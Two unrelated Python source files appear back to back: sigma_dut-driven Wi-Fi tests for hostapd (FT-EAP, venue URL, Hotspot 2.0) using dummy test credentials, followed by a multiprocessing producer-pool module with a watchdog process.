def test_sigma_dut_ap_ent_ft_eap(dev, apdev, params):
"""sigma_dut controlled AP WPA-EAP and FT-EAP"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_ent_ft_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ent-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-FT-EAP")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ent-ft-eap", key_mgmt="FT-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[1].connect("test-ent-ft-eap", key_mgmt="WPA-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_venue_url(dev, apdev):
"""sigma_dut controlled Venue URL fetch"""
try:
run_sigma_dut_venue_url(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_venue_url(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, debug=True)
ssid = "venue"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
venue_group = 1
venue_type = 13
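    # Venue Info field: one octet Venue Group followed by one octet Venue Type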
venue_info = struct.pack('BB', venue_group, venue_type)
lang1 = "eng"
    name1 = "Example venue"
lang2 = "fin"
name2 = "Esimerkkipaikka"
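    # each Venue Name duple: one-octet length, three-character language code,
    # then the venue name itself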
venue1 = struct.pack('B', len(lang1 + name1)) + lang1 + name1
venue2 = struct.pack('B', len(lang2 + name2)) + lang2 + name2
venue_name = binascii.hexlify(venue_info + venue1 + venue2)
url1 = "http://example.com/venue"
url2 = "https://example.org/venue-info/"
params["venue_group"] = str(venue_group)
params["venue_type"] = str(venue_type)
params["venue_name"] = [ lang1 + ":" + name1, lang2 + ":" + name2 ]
params["venue_url"] = [ "1:" + url1, "2:" + url2 ]
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "venue", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "venue"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_hs2_venue_info,interface," + ifname + ",Display,Yes")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_hs20_assoc_24(dev, apdev):
"""sigma_dut controlled Hotspot 2.0 connection (2.4 GHz)"""
run_sigma_dut_hs20_assoc(dev, apdev, True)
def test_sigma_dut_hs20_assoc_5(dev, apdev):
"""sigma_dut controlled Hotspot 2.0 connection (5 GHz)"""
run_sigma_dut_hs20_assoc(dev, apdev, False)
def run_sigma_dut_hs20_assoc(dev, apdev, band24):
hapd0 = None
hapd1 = None
try:
bssid0 = apdev[0]['bssid']
params = hs20_ap_params()
params['hessid'] = bssid0
hapd0 = hostapd.add_ap(apdev[0], params)
bssid1 = apdev[1]['bssid']
params = hs20_ap_params()
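        # the second AP advertises the same HESSID so that both BSSes belong
        # to the same homogeneous ESS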
params['hessid'] = bssid0
params["hw_mode"] = "a"
params["channel"] = "36"
params["country_code"] = "US"
hapd1 = hostapd.add_ap(apdev[1], params)
band = "2.4" if band24 else "5"
exp_bssid = bssid0 if band24 else bssid1
run_sigma_dut_hs20_assoc_2(dev, apdev, band, exp_bssid)
finally:
dev[0].request("DISCONNECT")
if hapd0:
hapd0.request("DISABLE")
if hapd1:
hapd1.request("DISABLE")
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
def run_sigma_dut_hs20_assoc_2(dev, apdev, band, expect_bssid):
check_eap_capa(dev[0], "MSCHAPV2")
dev[0].flush_scan_cache()
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, debug=True)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,HS2-R3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_add_credential,interface,%s,type,uname_pwd,realm,example.com,username,hs20-test,password,password" % ifname)
res = sigma_dut_cmd_check("sta_hs2_associate,interface,%s,band,%s" % (ifname, band),
timeout=15)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
if "BSSID," + expect_bssid not in res:
raise Exception("Unexpected BSSID: " + res)
def test_sigma_dut_ap_hs20(dev, apdev, params):
"""sigma_dut controlled AP with Hotspot 2.0 parameters"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_hs20.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,program,HS2-R3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,WLAN_TAG,1,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,WPA2-ENT")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,HESSID,02:12:34:56:78:9a,NAI_REALM_LIST,1,OPER_NAME,1")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OSU_SERVER_URI,https://example.com/ https://example.org/,OSU_SSID,test-osu,OSU_METHOD,SOAP SOAP,OSU_PROVIDER_LIST,10,OSU_PROVIDER_NAI_LIST,4")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,NET_AUTH_TYPE,2")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,VENUE_NAME,1")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,DOMAIN_LIST,example.com")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OPERATOR_ICON_METADATA,1")
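            # second BSS (WLAN_TAG 2): open OSU SSID for online sign-up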
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,test-osu,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,2,OSU,1")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "r") as f:
logger.debug("hostapd.conf from sigma_dut:\n" + f.read())
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
|
producer_pool.py
|
try:
    import Queue
except ImportError:
    import queue as Queue
import logging
import multiprocessing
import os
import sys
import time
import traceback
import numpy as np
logger = logging.getLogger(__name__)
class NoResult(Exception):
pass
class ParentDied(Exception):
pass
class WorkersDied(Exception):
pass
class ProducerPool(object):
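    '''Run a set of callables in parallel worker processes and collect their
    results in a shared queue. A separate watch-dog process supervises the
    workers and reports back if they or the parent process die.'''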
def __init__(self, callables, queue_size=10):
self.__watch_dog = multiprocessing.Process(target=self.__run_watch_dog, args=(callables,))
self.__stop = multiprocessing.Event()
self.__result_queue = multiprocessing.Queue(queue_size)
def __del__(self):
self.stop()
def start(self):
'''Start the pool of producers.'''
if self.__watch_dog is None:
raise RuntimeError("can't start a ProducerPool a second time")
if self.__watch_dog.is_alive():
logger.warning("trying to start workers, but they are already running")
return
self.__stop.clear()
self.__watch_dog.start()
    def get(self, timeout=0):
        '''Return the next result from the producer pool.

        If timeout is set and there is no result after the given number of
        seconds, exception NoResult is raised. The default timeout of 0
        blocks until a result is available, polling the queue once per
        second.
        '''
        block = False
        if timeout == 0:
            timeout = 1
            block = True
        item = None
        while item is None:
try:
item = self.__result_queue.get(timeout=timeout)
except Queue.Empty:
if not block:
raise NoResult()
if isinstance(item, Exception):
raise item
return item
    def stop(self):
        '''Stop the pool of producers.

        Items currently being produced will not be waited for and will be
        discarded.'''
if self.__watch_dog is None:
return
self.__stop.set()
self.__watch_dog.join()
self.__watch_dog = None
def __run_watch_dog(self, callables):
parent_pid = os.getppid()
logger.debug("watchdog started with PID " + str(os.getpid()))
logger.debug("parent PID " + str(parent_pid))
workers = [ multiprocessing.Process(target=self.__run_worker, args=(c,)) for c in callables ]
try:
            logger.debug("starting %d workers" % len(workers))
for worker in workers:
worker.start()
while not self.__stop.wait(1):
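                # if the parent dies, this process is re-parented and
                # getppid() no longer matches the pid recorded at start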
if os.getppid() != parent_pid:
logger.error("parent of producer pool died, shutting down")
self.__result_queue.put(ParentDied())
break
if not self.__all_workers_alive(workers):
logger.error("at least one of my workers died, shutting down")
self.__result_queue.put(WorkersDied())
break
        except:
            # swallow interrupts (e.g., KeyboardInterrupt) and proceed to the
            # worker cleanup in the finally block below
            pass
finally:
logger.info("terminating workers...")
for worker in workers:
worker.terminate()
logger.info("joining workers...")
for worker in workers:
worker.join()
logger.info("done")
def __run_worker(self, target):
parent_pid = os.getppid()
logger.debug("worker started with PID " + str(os.getpid()))
logger.debug("parent PID " + str(parent_pid))
result = None
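        # re-seed numpy in every worker so forked processes do not produce
        # identical random sequences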
np.random.seed(None)
while True:
if os.getppid() != parent_pid:
                logger.debug("worker %d: watch-dog died, stopping" % os.getpid())
break
if result is None:
try:
result = target()
except Exception as e:
result = e
traceback.print_exc()
# don't stop on normal exceptions -- place them in result queue
# and let them be handled by caller
except:
logger.error("received error: " + str(sys.exc_info()[0]))
# this is most likely a keyboard interrupt, stop process
break
try:
self.__result_queue.put(result, timeout=1)
result = None
except Queue.Full:
                logger.debug("worker %d: result queue is full, waiting to place my result" % os.getpid())
logger.debug("worker with PID " + str(os.getpid()) + " exiting")
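        # _exit() terminates the process immediately, skipping the
        # multiprocessing cleanup handlers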
os._exit(1)
    def __all_workers_alive(self, workers):
        return all(worker.is_alive() for worker in workers)
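# A minimal usage sketch (an assumption, not part of the original module):
# each callable passed to ProducerPool runs repeatedly in its own process,
# and results are pulled from the shared queue with get(). The locally
# defined callable relies on a fork-based multiprocessing start method.
if __name__ == '__main__':
    def produce():
        time.sleep(0.1)  # simulate an expensive computation
        return np.random.rand(2, 2)

    pool = ProducerPool([produce] * 2, queue_size=4)
    pool.start()
    try:
        for _ in range(3):
            print(pool.get())  # blocks until a worker delivers a result
    finally:
        pool.stop()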
|